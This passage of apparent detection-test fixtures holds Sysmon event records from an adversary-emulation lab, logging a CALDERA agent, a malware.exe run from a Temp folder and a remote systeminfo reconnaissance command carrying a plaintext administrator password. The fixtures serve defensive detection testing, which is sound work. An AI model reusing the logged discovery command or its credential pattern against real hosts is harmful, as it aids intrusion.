"C:\\Windows\\system32\\services.exe", 15 | "ParentImage": "C:\\Windows\\System32\\services.exe", 16 | "ParentProcessGuid": "{8C352DC7-3282-5AC7-0000-0010A85F0000}", 17 | "ParentProcessId": "444", 18 | "ProcessGuid": "{8C352DC7-3D94-5AC7-0000-00109A7E1300}", 19 | "ProcessId": "1876", 20 | "Product": " ", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "241060", 31 | "Execution": { 32 | "ProcessID": "1568", 33 | "ThreadID": "1984" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "C:\\commander.exe", 57 | "Company": " ", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": " ", 60 | "FileVersion": "0.0.0.0", 61 | "Hashes": "SHA1=0BDEB7F7EC9281E4CBAC0B3245B7B61EA3B9AB6C,MD5=F62CD73327B30C468ECEA1A68AB4D095,SHA256=38E28F4A22206BA506C8FF60A78EB18A93027E91CF45E817EA60EF28D2E5C3C7,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 62 | "Image": "C:\\commander.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\Windows\\system32\\services.exe", 67 | "ParentImage": "C:\\Windows\\System32\\services.exe", 68 | "ParentProcessGuid": "{8C352DC7-3282-5AC7-0000-0010A85F0000}", 69 | "ParentProcessId": "444", 70 | "ProcessGuid": "{8C352DC7-3E2E-5AC7-0000-0010788D1300}", 71 | "ProcessId": "2104", 72 | "Product": " ", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "241309", 83 | "Execution": { 84 | "ProcessID": "1568", 85 | "ThreadID": "1984" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "C:\\commander.exe", 109 | "Company": " ", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": " ", 112 | "FileVersion": "0.0.0.0", 113 | "Hashes": "SHA1=0BDEB7F7EC9281E4CBAC0B3245B7B61EA3B9AB6C,MD5=F62CD73327B30C468ECEA1A68AB4D095,SHA256=38E28F4A22206BA506C8FF60A78EB18A93027E91CF45E817EA60EF28D2E5C3C7,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 114 | "Image": "C:\\commander.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\Windows\\system32\\services.exe", 119 | "ParentImage": "C:\\Windows\\System32\\services.exe", 120 | "ParentProcessGuid": "{8C352DC7-3282-5AC7-0000-0010A85F0000}", 121 | "ParentProcessId": "444", 122 | "ProcessGuid": "{8C352DC7-3ECD-5AC7-0000-001008A31300}", 123 | "ProcessId": "1924", 124 | "Product": " ", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | "System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "241640", 135 | "Execution": { 136 | "ProcessID": "1568", 137 | "ThreadID": "1984" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": "Microsoft-Windows-Sysmon" 145 | }, 146 | "Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /tests/SvcHostUnsignedDll.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Hashes": "SHA1=9208F94662CFE80A92D7B271838ADD91B8616618,MD5=3B367397320C26DBA890B260F80D1B1B,SHA256=50BBE71B4380B5E86E197AF86F5C08266DD6B12344BA4ABDEA604B8C774C4147,IMPHASH=275BEA6369D0DEC294882377BE493DB5", 5 | "Image": "C:\\Windows\\System32\\svchost.exe", 6 | "ImageLoaded": "C:\\Windows\\System32\\hnetcfg.dll", 7 | "ProcessGuid": "49F1AF32-4E57-59BD-0000-001016E80000", 8 | "ProcessId": "920", 9 | "Signature": "", 10 | "SignatureStatus": "Unavailable", 11 | "Signed": "false", 12 | "UtcTime": "4242-04-24 13:37:42.422" 13 | }, 14 | "System": { 15 | "Channel": "Microsoft-Windows-Sysmon/Operational", 16 | "Computer": "BLAHBLAH", 17 | "Correlation": {}, 18 | "EventID": "7", 19 | "EventRecordID": "826971", 20 | "Execution": { 21 | "ProcessID": "1332", 22 | "ThreadID": "1932" 23 | }, 24 | "Keywords": "0x8000000000000000", 25 | "Level": "4", 26 | "Opcode": "0", 27 | "Provider": { 28 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 29 | "Name": "Microsoft-Windows-Sysmon" 30 | }, 31 | "Security": { 32 | "UserID": "S-1-5-18" 33 | }, 34 | "Task": "7", 35 | "TimeCreated": { 36 | "SystemTime": "4242-04-24 13:37:42.422" 37 | }, 38 | "Version": "3" 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /tests/SvcHostUntrustedDLL.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Hashes": "SHA1=9208F94662CFE80A92D7B271838ADD91B8616618,MD5=3B367397320C26DBA890B260F80D1B1B,SHA256=50BBE71B4380B5E86E197AF86F5C08266DD6B12344BA4ABDEA604B8C774C4147,IMPHASH=275BEA6369D0DEC294882377BE493DB5", 5 | "Image": "C:\\Windows\\System32\\svchost.exe", 6 | "ImageLoaded": "C:\\Windows\\System32\\hnetcfg.dll", 7 | "ProcessGuid": "49F1AF32-4E57-59BD-0000-001016E80000", 8 | "ProcessId": "920", 9 | "Signature": "", 10 | "SignatureStatus": "Unavailable", 11 | "Signed": "false", 12 | "UtcTime": "4242-04-24 13:37:42.422" 13 | }, 14 | "System": { 15 | "Channel": "Microsoft-Windows-Sysmon/Operational", 16 | "Computer": "BLAHBLAH", 17 | "Correlation": {}, 18 | "EventID": "7", 19 | "EventRecordID": "826971", 20 | "Execution": { 21 | "ProcessID": "1332", 22 | "ThreadID": "1932" 23 | }, 24 | "Keywords": "0x8000000000000000", 25 | "Level": "4", 26 | "Opcode": "0", 27 | "Provider": { 28 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 29 | "Name": "Microsoft-Windows-Sysmon" 30 | }, 31 | "Security": { 32 | "UserID": "S-1-5-18" 33 | }, 34 | "Task": "7", 35 | "TimeCreated": { 36 | "SystemTime": "4242-04-24 13:37:42.422" 37 | }, 38 | "Version": "3" 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /tests/SysmonConfigChanged.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Configuration": "\u000e:\\Program Files\\RawSecTools\\SysmonConfigs\\sysmon-config-master\\skeletons\\sysmon-v6.1.xml", 5 | "ConfigurationFileHash": "SHA1=8688E886342384F1736EB4BB82C9FFC83FF1AE86", 6 | "UtcTime": "4242-04-24 13:37:42.422" 7 | }, 8 | "System": { 9 | "Channel": "Microsoft-Windows-Sysmon/Operational", 10 | "Computer": "BLAHBLAH", 11 | "Correlation": {}, 12 | "EventID": "16", 13 | "EventRecordID": "1", 14 | "Execution": { 15 | "ProcessID": "1560", 16 | "ThreadID": "2848" 17 | }, 18 | "Keywords": "0x8000000000000000", 19 | "Level": "4", 20 | "Opcode": "0", 21 | "Provider": { 22 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 23 | "Name": "Microsoft-Windows-Sysmon" 24 | }, 25 | "Security": { 26 | "UserID": "S-1-5-21-2888932017-1170430559-1631822473-1000" 27 | }, 28 | "Task": "16", 29 | "TimeCreated": { 30 | "SystemTime": "4242-04-24 13:37:42.422" 31 | }, 32 | "Version": "3" 33 | } 34 | } 35 | } 36 | { 37 | "Event": { 38 | "EventData": { 39 | "Configuration": "C:\\Users\\calduser1\\Desktop\\agent-v0.1.0\\sysmonnew.xml", 40 | "ConfigurationFileHash": "SHA1=8D8B8FAF9F616C2962DEC9D675991F37D7C560E7", 41 | "UtcTime": "4242-04-24 13:37:42.422" 42 | }, 43 | "System": { 44 | "Channel": "Microsoft-Windows-Sysmon/Operational", 45 | "Computer": "BLAHBLAH", 46 | "Correlation": {}, 47 | "EventID": "16", 48 | "EventRecordID": "1277144", 49 | "Execution": { 50 | "ProcessID": "1640", 51 | "ThreadID": "804" 52 | }, 53 | "Keywords": "0x8000000000000000", 54 | "Level": "4", 55 | "Opcode": "0", 56 | "Provider": { 57 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 58 | "Name": "Microsoft-Windows-Sysmon" 59 | }, 60 | "Security": { 61 | "UserID": "S-1-5-21-610196800-1665352633-2058931075-500" 62 | }, 63 | "Task": "16", 64 | "TimeCreated": { 65 | "SystemTime": "4242-04-24 13:37:42.422" 66 | }, 67 | "Version": "3" 68 | } 69 | } 70 | } 71 | { 72 | "Event": { 73 | "EventData": { 74 | "Configuration": "\u000e:\\Program Files\\RawSecTools\\SysmonConfigs\\sysmon-config-master\\skeletons\\sysmon-v6.1.xml", 75 | "ConfigurationFileHash": "SHA1=8688E886342384F1736EB4BB82C9FFC83FF1AE86", 76 | "UtcTime": "4242-04-24 13:37:42.422" 77 | }, 78 | "System": { 79 | "Channel": "Microsoft-Windows-Sysmon/Operational", 80 | "Computer": "BLAHBLAH", 81 | "Correlation": {}, 82 | "EventID": "16", 83 | "EventRecordID": "1", 84 | "Execution": { 85 | "ProcessID": "2836", 86 | "ThreadID": "2840" 87 | }, 88 | "Keywords": "0x8000000000000000", 89 | "Level": "4", 90 | "Opcode": "0", 91 | "Provider": { 92 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 93 | "Name": "Microsoft-Windows-Sysmon" 94 | }, 95 | "Security": { 96 | "UserID": "S-1-5-21-2888932017-1170430559-1631822473-1000" 97 | }, 98 | "Task": "16", 99 | "TimeCreated": { 100 | "SystemTime": "4242-04-24 13:37:42.422" 101 | }, 102 | "Version": "3" 103 | } 104 | } 105 | } 106 | -------------------------------------------------------------------------------- /tests/SysmonStateChanged.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "SchemaVersion": "4.00", 5 | "State": "Stopped", 6 | "UtcTime": "4242-04-24 13:37:42.422", 7 | "Version": "7.01" 8 | }, 9 | "System": { 10 | "Channel": "Microsoft-Windows-Sysmon/Operational", 11 | "Computer": "BLAHBLAH", 12 | "Correlation": {}, 13 | "EventID": "4", 14 | "EventRecordID": "1272142", 15 | "Execution": { 16 | "ProcessID": "1408", 17 | "ThreadID": "1412" 18 | }, 19 | "Keywords": "0x8000000000000000", 20 | "Level": "4", 21 | "Opcode": "0", 22 | "Provider": { 23 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 24 | "Name": "Microsoft-Windows-Sysmon" 25 | }, 26 | "Security": { 27 | "UserID": "S-1-5-18" 28 | }, 29 | "Task": "4", 30 | "TimeCreated": { 31 | "SystemTime": "4242-04-24 13:37:42.422" 32 | }, 33 | "Version": "3" 34 | } 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /tests/SystemInfo.exe.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"systeminfo\" ", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Displays system information", 8 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 9 | "Hashes": "SHA1=7D7AB9FD711F9B670F2977A78EF2914DB4ECDBB8,MD5=4EAD4E81DB8B24F6D29B3C71FE48DBB9,SHA256=03D2EF40E7C019A526B1AEC22B273F1C4D407973DF7F8BD5028C31CCACA9A492,IMPHASH=6012687C99DFEFA15CCE0632B5445521", 10 | "Image": "C:\\Windows\\System32\\systeminfo.exe", 11 | "IntegrityLevel": "High", 12 | "LogonGuid": "{8C352DC7-3AEA-5A94-0000-002097241100}", 13 | "LogonId": "0x112497", 14 | "ParentCommandLine": "C:\\Windows\\PSEXESVC.exe", 15 | "ParentImage": "C:\\Windows\\PSEXESVC.exe", 16 | "ParentProcessGuid": "{8C352DC7-3AE9-5A94-0000-0010501F1100}", 17 | "ParentProcessId": "1872", 18 | "ProcessGuid": "{8C352DC7-3AEA-5A94-0000-00106C261100}", 19 | "ProcessId": "2964", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "CALDERA\\Administrator", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "104668", 31 | "Execution": { 32 | "ProcessID": "1508", 33 | "ThreadID": "1960" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"systeminfo.exe\" /fo csv", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Displays system information", 60 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 61 | "Hashes": "SHA1=F4124883BEF7C340F90A7237DDC9606902106863,MD5=DEBEA7D13C96687CAB4248DE0B6A2CE8,SHA256=58D1231E9BD2848E5014E1968CF10B043FCEBF411EF0E7D7F75B6A41867DFB61,IMPHASH=26836CD06EB32E4DA9DE1CE8D9DB287C", 62 | "Image": "C:\\Windows\\System32\\systeminfo.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\commander.exe -f", 67 | "ParentImage": "C:\\commander.exe", 68 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 69 | "ParentProcessId": "920", 70 | "ProcessGuid": "{49F1AF32-38BF-5AC7-0000-0010542C0B00}", 71 | "ProcessId": "808", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "884591", 83 | "Execution": { 84 | "ProcessID": "1456", 85 | "ThreadID": "1712" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "\"systeminfo.exe\" /fo csv /S calderadc.caldera.loc /U caldera\\administrator /p Admin123456", 109 | "Company": "Microsoft Corporation", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": "Displays system information", 112 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 113 | "Hashes": "SHA1=F4124883BEF7C340F90A7237DDC9606902106863,MD5=DEBEA7D13C96687CAB4248DE0B6A2CE8,SHA256=58D1231E9BD2848E5014E1968CF10B043FCEBF411EF0E7D7F75B6A41867DFB61,IMPHASH=26836CD06EB32E4DA9DE1CE8D9DB287C", 114 | "Image": "C:\\Windows\\System32\\systeminfo.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\commander.exe -f", 119 | "ParentImage": "C:\\commander.exe", 120 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 121 | "ParentProcessId": "920", 122 | "ProcessGuid": "{49F1AF32-3ACD-5AC7-0000-00106BA81300}", 123 | "ProcessId": "596", 124 | "Product": "Microsoft® Windows® Operating System", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | "System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "913762", 135 | "Execution": { 136 | "ProcessID": "1456", 137 | "ThreadID": "1712" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": "Microsoft-Windows-Sysmon" 145 | }, 146 | "Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /tests/UnkPrivDstPort.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "DestinationHostname": "caldera-server", 5 | "DestinationIp": "192.168.58.254", 6 | "DestinationIsIpv6": "false", 7 | "DestinationPort": "8888", 8 | "DestinationPortName": "", 9 | "Image": "C:\\Program Files\\cagent\\cagent.exe", 10 | "Initiated": "true", 11 | "ProcessGuid": "{49F1AF32-328B-5AC7-0000-0010974F0100}", 12 | "ProcessId": "1220", 13 | "Protocol": "tcp", 14 | "SourceHostname": "CALDERA01.caldera.loc", 15 | "SourceIp": "192.168.58.101", 16 | "SourceIsIpv6": "false", 17 | "SourcePort": "49727", 18 | "SourcePortName": "", 19 | "User": "NT AUTHORITY\\SYSTEM", 20 | "UtcTime": "4242-04-24 13:37:42.422" 21 | }, 22 | "System": { 23 | "Channel": "Microsoft-Windows-Sysmon/Operational", 24 | "Computer": "BLAHBLAH", 25 | "Correlation": {}, 26 | "EventID": "3", 27 | "EventRecordID": "1402320", 28 | "Execution": { 29 | "ProcessID": "1424", 30 | "ThreadID": "1680" 31 | }, 32 | "Keywords": "0x8000000000000000", 33 | "Level": "4", 34 | "Opcode": "0", 35 | "Provider": { 36 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 37 | "Name": "Microsoft-Windows-Sysmon" 38 | }, 39 | "Security": { 40 | "UserID": "S-1-5-18" 41 | }, 42 | "Task": "3", 43 | "TimeCreated": { 44 | "SystemTime": "4242-04-24 13:37:42.422" 45 | }, 46 | "Version": "5" 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /tests/UntrustedDriverLoaded.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Hashes": "SHA1=2D2C9DE6A65205521D38612D0B6556DA56C9DA1D,MD5=74CC8905700C74D50B8E4EB93021FF1A,SHA256=63F1D203FD33CA31465F917D245B80D237B82EECACE9911DD9347BD7501E791A,IMPHASH=0AD99AB07319C49E4B4CB24F50171FDE", 5 | "ImageLoaded": "C:\\Windows\\System32\\VBoxDisp.dll", 6 | "Signature": "Oracle Corporation", 7 | "SignatureStatus": "Valid", 8 | "Signed": "true", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "6", 16 | "EventRecordID": "836203", 17 | "Execution": { 18 | "ProcessID": "1336", 19 | "ThreadID": "1884" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "6", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "3" 36 | } 37 | } 38 | } 39 | { 40 | "Event": { 41 | "EventData": { 42 | "Hashes": "SHA1=8206E2D8374F5E7BF626E47D56D2431EDC939652,MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB", 43 | "ImageLoaded": "C:\\Windows\\System32\\drivers\\npf.sys", 44 | "Signature": "Riverbed Technology", 45 | "SignatureStatus": "Valid", 46 | "Signed": "true", 47 | "UtcTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "System": { 50 | "Channel": "Microsoft-Windows-Sysmon/Operational", 51 | "Computer": "BLAHBLAH", 52 | "Correlation": {}, 53 | "EventID": "6", 54 | "EventRecordID": "842106", 55 | "Execution": { 56 | "ProcessID": "1336", 57 | "ThreadID": "1884" 58 | }, 59 | "Keywords": "0x8000000000000000", 60 | "Level": "4", 61 | "Opcode": "0", 62 | "Provider": { 63 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 64 | "Name": "Microsoft-Windows-Sysmon" 65 | }, 66 | "Security": { 67 | "UserID": "S-1-5-18" 68 | }, 69 | "Task": "6", 70 | "TimeCreated": { 71 | "SystemTime": "4242-04-24 13:37:42.422" 72 | }, 73 | "Version": "3" 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /tests/UntrustedService.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Company": "Oracle Corporation", 5 | "Description": "VirtualBox Guest Additions Service", 6 | "FileVersion": "6.0.8.130520", 7 | "Hashes": "SHA1=AE49D900887E95D7B3040BFD2C888D3439F94035,MD5=3001126B78719A1189A0A5270DA316A0,SHA256=9A66844E7ADA8E2D1D454136D68413CE74D90004BAD754D79DAA1A020A27E86C,IMPHASH=6A98677D1BE25D4274AAA7C9C37E832F", 8 | "Image": "C:\\Windows\\System32\\VBoxService.exe", 9 | "ImageLoaded": "C:\\Windows\\System32\\VBoxService.exe", 10 | "ImageLoadedSize": "2732048", 11 | "IntegrityLevel": "System", 12 | "OriginalFileName": "?", 13 | "ParentCommandLine": "C:\\Windows\\system32\\services.exe", 14 | "ParentImage": "C:\\Windows\\System32\\services.exe", 15 | "ProcessGuid": "{515cd0d1-4af8-5d3f-0000-0010b4430100}", 16 | "ProcessId": "1488", 17 | "Product": "Oracle VM VirtualBox Guest Additions", 18 | "RuleName": "", 19 | "Signature": "Oracle Corporation", 20 | "SignatureStatus": "Valid", 21 | "Signed": "true", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "7", 30 | "EventRecordID": "7682610", 31 | "Execution": { 32 | "ProcessID": "892", 33 | "ThreadID": "6868" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "7", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "3" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/UserTempExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe\" ", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Windows Command Processor", 8 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 9 | "Hashes": "SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 10 | "Image": "C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe", 11 | "IntegrityLevel": "Medium", 12 | "LogonGuid": "{49F1AF32-DC25-5B05-0000-00207EB50400}", 13 | "LogonId": "0x4b57e", 14 | "ParentCommandLine": "C:\\Windows\\Explorer.EXE", 15 | "ParentImage": "C:\\Windows\\explorer.exe", 16 | "ParentProcessGuid": "{49F1AF32-DC26-5B05-0000-001016DF0400}", 17 | "ParentProcessId": "2284", 18 | "ProcessGuid": "{49F1AF32-E29B-5B05-0000-001004911600}", 19 | "ProcessId": "1092", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\calduser2", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "915850", 31 | "Execution": { 32 | "ProcessID": "1404", 33 | "ThreadID": "1732" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/WindowsTempExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "C:\\Windows\\TEMP\\7276A569-F3A6-419B-8132-4804CA5A8E39\\dismhost.exe {322E3077-E172-4373-BAD6-0D79FD0E56C7}", 5 | "CurrentDirectory": "C:\\Windows\\system32\\", 6 | "Hashes": "SHA1=958BE7D02FCA674FB386482090B9A5024D0A1538,MD5=516A5FCE06BB388499238A5F9286CB74,SHA256=9A4B735603297448841758B29D3C387A4CE84E5FD0DAE05622F43CE53B8C85E6,IMPHASH=4814B0801D16B74A024E98A232D111D9", 7 | "Image": "C:\\Windows\\Temp\\7276A569-F3A6-419B-8132-4804CA5A8E39\\DismHost.exe", 8 | "IntegrityLevel": "System", 9 | "LogonGuid": "49F1AF32-4E56-59BD-0000-0020E7030000", 10 | "LogonId": "0x000003e7", 11 | "ParentCommandLine": "C:\\Windows\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:R4bMnmTMZEGdePAk.1", 12 | "ParentImage": "C:\\Windows\\System32\\CompatTelRunner.exe", 13 | "ParentProcessGuid": "49F1AF32-87C2-59C1-0000-0010AE963A00", 14 | "ParentProcessId": "4036", 15 | "ProcessGuid": 